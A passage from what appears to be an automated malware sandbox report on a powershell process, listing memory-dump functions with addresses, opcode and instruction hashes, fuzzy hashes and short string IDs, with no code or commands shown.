                                                                      • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                      • Instruction Fuzzy Hash: EF219D76504240DFCF06CF10D9C4B16BFB2FB48314F24C5A9D9494A656C33AD86ACBA1
                                                                      Function 0484D590 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7458bba9ed0834dddf61d4e92807258e0c20afa21ce36c71e990a273e002c5f6
                                                                      • Instruction ID: 3d016e814518d11f868b3ae972555ff2662de9f4bfb797dec09b3abd51c3bc82
                                                                      • Opcode Fuzzy Hash: 7458bba9ed0834dddf61d4e92807258e0c20afa21ce36c71e990a273e002c5f6
                                                                      • Instruction Fuzzy Hash: 2E01AD397052508FC7069728A01C46E3BA3EBCA262326414EE807CB396CFB4AC069B65
                                                                      Function 0479D01D Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588239853.000000000479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0479D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_479d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b964dd833c6497d548d2ad22719d5ec80e9f0ac89339dafc08381cb76674d3fd
                                                                      • Instruction ID: 17699e4e21c92d49dde82b965021fa83b707a5cb3d8e9fe1ddb7f3637e59a32a
                                                                      • Opcode Fuzzy Hash: b964dd833c6497d548d2ad22719d5ec80e9f0ac89339dafc08381cb76674d3fd
                                                                      • Instruction Fuzzy Hash: B501F731104304AADB308E5EFD84B67BFD8EF85324F18C969ED480B346D279AC41CAB5
                                                                      Function 0484F1D0 Relevance: .0, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 046112b7b3edceb1c1f862fe6b5fad94d678dbf280450962e74b53a79faae715
                                                                      • Instruction ID: 0902cd093c7c6ca0a17b5359e6b6d2afdda573ae1a4207c451bee8777aa3fb81
                                                                      • Opcode Fuzzy Hash: 046112b7b3edceb1c1f862fe6b5fad94d678dbf280450962e74b53a79faae715
                                                                      • Instruction Fuzzy Hash: 74F0F0393001045BDB242669B448A6E76ABFBCD250B108A3DD60FC7398DE35AC058391
                                                                      Function 0484FF00 Relevance: .0, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dff19a0d7db98219cbf9255f973a0d9855ee3e2fcd3c1068f08f260deec3a111
                                                                      • Instruction ID: 161e6d7c21e9021daaa5f40d5c1b668283e5dd0a6794c7ed4131a7a926c2324f
                                                                      • Opcode Fuzzy Hash: dff19a0d7db98219cbf9255f973a0d9855ee3e2fcd3c1068f08f260deec3a111
                                                                      • Instruction Fuzzy Hash: 2201FB35A011199FCB05CB98D990AFEF776FF88314B248568EA15E7264CB32AD52CB50
                                                                      Function 0484D5A0 Relevance: .0, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71c329e79798f1f9b1fcacad9d4dcbf5fc4ad0ea80199ca3d6b9de68aa3331fc
                                                                      • Instruction ID: 404aca6d5ecb71b69c7740efe5bd07ed13358e523756069330cdd42c549e18ac
                                                                      • Opcode Fuzzy Hash: 71c329e79798f1f9b1fcacad9d4dcbf5fc4ad0ea80199ca3d6b9de68aa3331fc
                                                                      • Instruction Fuzzy Hash: 23F030397005148F8716AB68A01C43E77EBEBCD662325411EF907C7395DF34EC028B95
                                                                      Function 0479D01C Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588239853.000000000479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0479D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_479d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1ce66f9a10d5d9e14210468b6d6183424cf13945d9ab67a3e2ca6f488ccb8cb8
                                                                      • Instruction ID: e934ca1a9d885ab82ca0a8b490dfefed63d7baff7a4eed718e71092880a99254
                                                                      • Opcode Fuzzy Hash: 1ce66f9a10d5d9e14210468b6d6183424cf13945d9ab67a3e2ca6f488ccb8cb8
                                                                      • Instruction Fuzzy Hash: E1F0C871004344AEEB208E19EC84762FFD8EF41734F18C45AED480A346C2796840CAB5
                                                                      Function 0484F1C0 Relevance: .0, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 951b502579a5c2d1b84a7a78ad0ac1f40461a6edefd116306185df09ac8fb966
                                                                      • Instruction ID: 3489961822a28c02ab5110efabb6e3577ecf0cc35c87d0002e2e261bd08c25a5
                                                                      • Opcode Fuzzy Hash: 951b502579a5c2d1b84a7a78ad0ac1f40461a6edefd116306185df09ac8fb966
                                                                      • Instruction Fuzzy Hash: 04F027363092810BC71713ACB45C1A97F77EBCF11431585EFD54ACB357C9615C058362
                                                                      Function 0484FB75 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f52be4005e038cdca5ed054e5835c19198bc7d12d6ebff7efff2b7a4a3e15e9d
                                                                      • Instruction ID: 3dab0a6af3d71f9b741506fe2c79210fe16068a4c6d882a6a3ffb868e61270b0
                                                                      • Opcode Fuzzy Hash: f52be4005e038cdca5ed054e5835c19198bc7d12d6ebff7efff2b7a4a3e15e9d
                                                                      • Instruction Fuzzy Hash: 3BE0D835344A1057DB092774A41C6AEBA5AEBC5727F04412DE40A8B382CF791905C7E6
                                                                      Function 0484FB78 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3906e24eb1a87ee6253292e4ac035f70b1074de03016000547dc3f71f051793c
                                                                      • Instruction ID: 36a5d0bb61387983f04b3272526fa2481aec4326ab5c83360bbcd2fea6503b95
                                                                      • Opcode Fuzzy Hash: 3906e24eb1a87ee6253292e4ac035f70b1074de03016000547dc3f71f051793c
                                                                      • Instruction Fuzzy Hash: 4AE0263134461457CF093778A00C6AEBB9AEBC972AF00412DE80BC7382CF792906C3E6
                                                                      Function 0484FD7F Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6a4155268f628d9278d3e21a9e92bf8b8539e223b293b20aa8ced5fe410ae41
                                                                      • Instruction ID: eeb82ba13a94376a7347d910b6e0db09c0e088cb00e7c8b83e86c1c8a616aeaa
                                                                      • Opcode Fuzzy Hash: e6a4155268f628d9278d3e21a9e92bf8b8539e223b293b20aa8ced5fe410ae41
                                                                      • Instruction Fuzzy Hash: 2BE09274D053195FC340DFA9D8411AEFFF49E85208F24C5AEC548D7202E6715652CBD2
                                                                      Function 0484F938 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93b20759d5f3709f2855a227bc3545a1da873f83d4513feda3812c311eead5ec
                                                                      • Instruction ID: f5991cff422f3ec47cf922c20c26c65d4a46162aeb3fd1e0e35eb42def94c334
                                                                      • Opcode Fuzzy Hash: 93b20759d5f3709f2855a227bc3545a1da873f83d4513feda3812c311eead5ec
                                                                      • Instruction Fuzzy Hash: 11E01270844549CFC74DAF64EA260A9BF34FB02317F504198DA17961F1DB701906CFA1
                                                                      Function 0484FD90 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                      • Instruction ID: 1fdd9393b06150b4e07a3f99240770431274f8a4d90ee74caab199973ccbe8f6
                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                      • Instruction Fuzzy Hash: FED042B0D0421D9F8780EFA9894156EFBF4AB49204B6085AA8A19E7201F7329A128BD1
                                                                      Function 0484F948 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3d44d4910909784caa438604600ce03c61fc25a01663a4f57ae4904fd5c0095b
                                                                      • Instruction ID: c0b68c9d3f6a67553f106703c5b718702f93ed6eb52c259ab6b8edbc21ac7200
                                                                      • Opcode Fuzzy Hash: 3d44d4910909784caa438604600ce03c61fc25a01663a4f57ae4904fd5c0095b
                                                                      • Instruction Fuzzy Hash: 17D06270D8414DDBCB58ABA4D55A4BDBB74FB50207F80415DDA0B521D2EE302556CAC1
                                                                      Function 0484FA10 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 54c58222eb847f06ea4a0fd5c1024de6ea6ac0934fee6d64719cd3e990725818
                                                                      • Instruction ID: d9d9153e32ae43d0c2b9f7955d85df8f42a570b64ddee9b28a54118464ad99a4
                                                                      • Opcode Fuzzy Hash: 54c58222eb847f06ea4a0fd5c1024de6ea6ac0934fee6d64719cd3e990725818
                                                                      • Instruction Fuzzy Hash: 87D01774A4420C8F8B94EFA4E84A46EBBB5FB44205F00426DEA0A93380EA302841CBC0
                                                                      Function 077C1A7E Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2dd2e85c0b6b64e14d8e1752667ea1f913b46244d8c3f19b81846fe9f4c2d71b
                                                                      • Instruction ID: 8aa66bfeba9e0a092cc3b7060315fb7451054bd50a472a912e28fcac63cdaef8
                                                                      • Opcode Fuzzy Hash: 2dd2e85c0b6b64e14d8e1752667ea1f913b46244d8c3f19b81846fe9f4c2d71b
                                                                      • Instruction Fuzzy Hash: 45A011B03002008BCA80CA00C882C00B320AB82A08B28C088A8088F282CF23EA03CB00

                                                                      Non-executed Functions

                                                                      Function 077CE888 Relevance: 17.8, Strings: 14, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                      • API String ID: 0-720800717
                                                                      • Opcode ID: 185458875fc125eaf104655832b9359cedefc102d850a54f6eb45e9c9b94476f
                                                                      • Instruction ID: ffd5536754a7b02fced18af83993b78004142aa68ea74cb869e5e6588fe2bd89
                                                                      • Opcode Fuzzy Hash: 185458875fc125eaf104655832b9359cedefc102d850a54f6eb45e9c9b94476f
                                                                      • Instruction Fuzzy Hash: 10A115B1B1021A8FCB28CE698550A7AB7E6AF8D790F14886ED8058B344DAB1C841C7A1
                                                                      Function 077CDCA8 Relevance: 14.1, Strings: 11, Instructions: 369COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                      • API String ID: 0-2004741541
                                                                      • Opcode ID: c04954d0f948235b2d148c5e876423b93f61b60ea3eca1d61bc119e35966d946
                                                                      • Instruction ID: ba8ef1866669403b3f3e343f832566163492e81e5782ddd9942fb00e1493f2ac
                                                                      • Opcode Fuzzy Hash: c04954d0f948235b2d148c5e876423b93f61b60ea3eca1d61bc119e35966d946
                                                                      • Instruction Fuzzy Hash: D5C125B1B0420ADFCB39CF28C4446AA77A6BF89390F14C87ED8558B255DB31C895CBA1
                                                                      Function 077CF125 Relevance: 14.0, Strings: 11, Instructions: 285COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                                                                      • API String ID: 0-3029092631
                                                                      • Opcode ID: ea891e33067cb03c09de65cf913e5cf8eb1313410dfd8b66764340072d8b1e92
                                                                      • Instruction ID: 9f756286452029f602c8bca50280936a8d0bb054ad986b4288ffa8d89a77f8f6
                                                                      • Opcode Fuzzy Hash: ea891e33067cb03c09de65cf913e5cf8eb1313410dfd8b66764340072d8b1e92
                                                                      • Instruction Fuzzy Hash: 01A1F4B27102059FCB24DF68C940A6ABBA7AF8D750F54CC6EE8459F291CB31DD41C7A1
                                                                      Function 077C75E0 Relevance: 8.9, Strings: 7, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$$]q$$]q$$]q$|l$|l
                                                                      • API String ID: 0-1275616974
                                                                      • Opcode ID: 36c10c3227960eb2c159aa41d522fc747954ed85dc6c36942a872f399f833ec7
                                                                      • Instruction ID: 5cc01b2d7fe8b8957575be3ae24885bcafdc89757d5e18b100b28563280c6465
                                                                      • Opcode Fuzzy Hash: 36c10c3227960eb2c159aa41d522fc747954ed85dc6c36942a872f399f833ec7
                                                                      • Instruction Fuzzy Hash: F7514AB170430A8FCB2DCA7D891136ABBA5AFC93A5F14886FD445CB251DE35C845CBE1
                                                                      Function 077CBFB6 Relevance: 7.9, Strings: 6, Instructions: 403COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$4']q$4']q$x.wk$-wk
                                                                      • API String ID: 0-2553437242
                                                                      • Opcode ID: 5dafd73395d4b777286c453dfaa57a011d4f03e612bc14c3bbe9580518f65b00
                                                                      • Instruction ID: 52b6d01e8afcf804e168e78f7cbc98a4faf3c102ed908b9f6d60ca153358aa1a
                                                                      • Opcode Fuzzy Hash: 5dafd73395d4b777286c453dfaa57a011d4f03e612bc14c3bbe9580518f65b00
                                                                      • Instruction Fuzzy Hash: 7D1263B4A002199FDB24CF58C991B9EB7B2FF89304F1085E8D9096B741DB72AD85CF91
                                                                      Function 077CFBA5 Relevance: 7.7, Strings: 6, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: XRbq$XRbq$XRbq$tP]q$tP]q$$]q
                                                                      • API String ID: 0-1061996819
                                                                      • Opcode ID: 4e56b86842168a3f6b80bd1ba4c2f01c9fbfd11059749a0752814698c7888db5
                                                                      • Instruction ID: 334bb0194636e4a430a1916fc0755d1ee07500610a9c96e0509ce7d4075e25fa
                                                                      • Opcode Fuzzy Hash: 4e56b86842168a3f6b80bd1ba4c2f01c9fbfd11059749a0752814698c7888db5
                                                                      • Instruction Fuzzy Hash: 4461F772B002059FCB24DF6885506AABBB3EF89750F64CC6EE8059F295CB31DC45C7A1
                                                                      Function 077CE80F Relevance: 7.7, Strings: 6, Instructions: 174COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$d%cq$d%cq$d%cq$tP]q$$]q
                                                                      • API String ID: 0-3562389410
                                                                      • Opcode ID: 6446244560f53972974bf275f6d844af0e24cda9b710bad5485385174f84fdc6
                                                                      • Instruction ID: 25b76c70faf617e37837865268c001ccbc20bfe35b4387fa8eaff9ef035c13b8
                                                                      • Opcode Fuzzy Hash: 6446244560f53972974bf275f6d844af0e24cda9b710bad5485385174f84fdc6
                                                                      • Instruction Fuzzy Hash: A05138B0614345DFDB24CF14C690A7D7BE6AF8E390F5988AED4059B291C7B1DC40CB62
                                                                      Function 077CE867 Relevance: 7.7, Strings: 6, Instructions: 163COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$d%cq$d%cq$d%cq$tP]q$$]q
                                                                      • API String ID: 0-3562389410
                                                                      • Opcode ID: 11386e9e214baa129994d89b25e1e6a9d5a8f0d5db660ce7a5b01cba4d0bcea5
                                                                      • Instruction ID: cf6fda3e35cf740ef0f8fb36bdb817754db07199f1cedbfb637ca5bca458c5cc
                                                                      • Opcode Fuzzy Hash: 11386e9e214baa129994d89b25e1e6a9d5a8f0d5db660ce7a5b01cba4d0bcea5
                                                                      • Instruction Fuzzy Hash: A451F7B0610346DFCB24CF14C691A79BBE6AF8E790F1989AEE8059B291C7B1DD40C761
                                                                      Function 077CEF9E Relevance: 7.6, Strings: 6, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$TQbq$TQbq$$]q$$]q
                                                                      • API String ID: 0-3395436538
                                                                      • Opcode ID: 4680f7f899b7ad368001d68a37cb54944642a05a702de52c9817c2b5d375e364
                                                                      • Instruction ID: 83119c6d9c6c1fda1747cd372ea11af3e4c1d915a91236eeaa36d5654918a1b5
                                                                      • Opcode Fuzzy Hash: 4680f7f899b7ad368001d68a37cb54944642a05a702de52c9817c2b5d375e364
                                                                      • Instruction Fuzzy Hash: C711E1B260024ECBDB69CE58E9445AB37AAFF49791F50086DFC111B284C7B08C56CBA1
                                                                      Function 077C0538 Relevance: 6.4, Strings: 5, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                      • API String ID: 0-2353078639
                                                                      • Opcode ID: 1bc985f791a63a4a43a4a8a2017aa91ab5bdda6b2d8718e74cd2903bf09dea74
                                                                      • Instruction ID: b96b80c23532bcb5a864558e1a1b7c2b7118f6c5d29f7775cbf486ed6c997ddc
                                                                      • Opcode Fuzzy Hash: 1bc985f791a63a4a43a4a8a2017aa91ab5bdda6b2d8718e74cd2903bf09dea74
                                                                      • Instruction Fuzzy Hash: A64147B1B14305DFCB24DE299C206BA7BA2DFC9794F04486ED905DB291DB32C946C7E2
                                                                      Function 077C2448 Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                      • API String ID: 0-2353078639
                                                                      • Opcode ID: a19125f27a5631702fb0ca93bcd37ed4ee952e48da6a510adff0185daa65c3d6
                                                                      • Instruction ID: b646abfef8461de4ce8b61af561a18a4a5a3c52e08c5a80de5b7bb94fb5061f8
                                                                      • Opcode Fuzzy Hash: a19125f27a5631702fb0ca93bcd37ed4ee952e48da6a510adff0185daa65c3d6
                                                                      • Instruction Fuzzy Hash: 344147B2300206DBCB29CE6C94A0576B7E5BFC93A1F648CAECD958B252DB30C901C711
                                                                      Function 077CE9AE Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                                                      • API String ID: 0-1723543176
                                                                      • Opcode ID: ea62665f2516e4c70baedc7f6bf3707f35c4d0190a53fd31c872ab7bdd9c95af
                                                                      • Instruction ID: 44f6f04ea69b3730b5674931c84e56e5b81d7f01ce4c9889279b83ac7e5507c5
                                                                      • Opcode Fuzzy Hash: ea62665f2516e4c70baedc7f6bf3707f35c4d0190a53fd31c872ab7bdd9c95af
                                                                      • Instruction Fuzzy Hash: 9931AFB0B002159FCB24DF58C590A6EBBB2BB8D760F59895DE8056B350C771EC41CBA1
                                                                      Function 077CE178 Relevance: 5.5, Strings: 4, Instructions: 483COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o]q$(o]q$(o]q$(o]q
                                                                      • API String ID: 0-1261621458
                                                                      • Opcode ID: 9370c229b8ae63e67d6e1ba95d3f92a7d6b17293d24fe2a272bca6aa64087ed9
                                                                      • Instruction ID: f08e146d9660711e22f36056cc5c5c5eca9555d18e7881912e660afa477ea9e8
                                                                      • Opcode Fuzzy Hash: 9370c229b8ae63e67d6e1ba95d3f92a7d6b17293d24fe2a272bca6aa64087ed9
                                                                      • Instruction Fuzzy Hash: F2F158B1704345DFDB24CF68D8447AA7BA2FF89390F14886EE905CB291DBB1D845CBA1
                                                                      Function 077C95A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $]q$$]q$$]q$$]q
                                                                      • API String ID: 0-858218434
                                                                      • Opcode ID: 76d6af6d66f65936e9161f9c6d5dd7d7031c3ceb53e4b909583ffe35b95f5485
                                                                      • Instruction ID: 4dad79596eccf8f19405b44c33da5f214c8b21817af0bd70a04bb1c922954261
                                                                      • Opcode Fuzzy Hash: 76d6af6d66f65936e9161f9c6d5dd7d7031c3ceb53e4b909583ffe35b95f5485
                                                                      • Instruction Fuzzy Hash: 0C217CF13003069BDB74992A5940B37B7DA9BC9758F248C3E9B49D73C1CD36E8408B60
                                                                      Function 077C0308 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
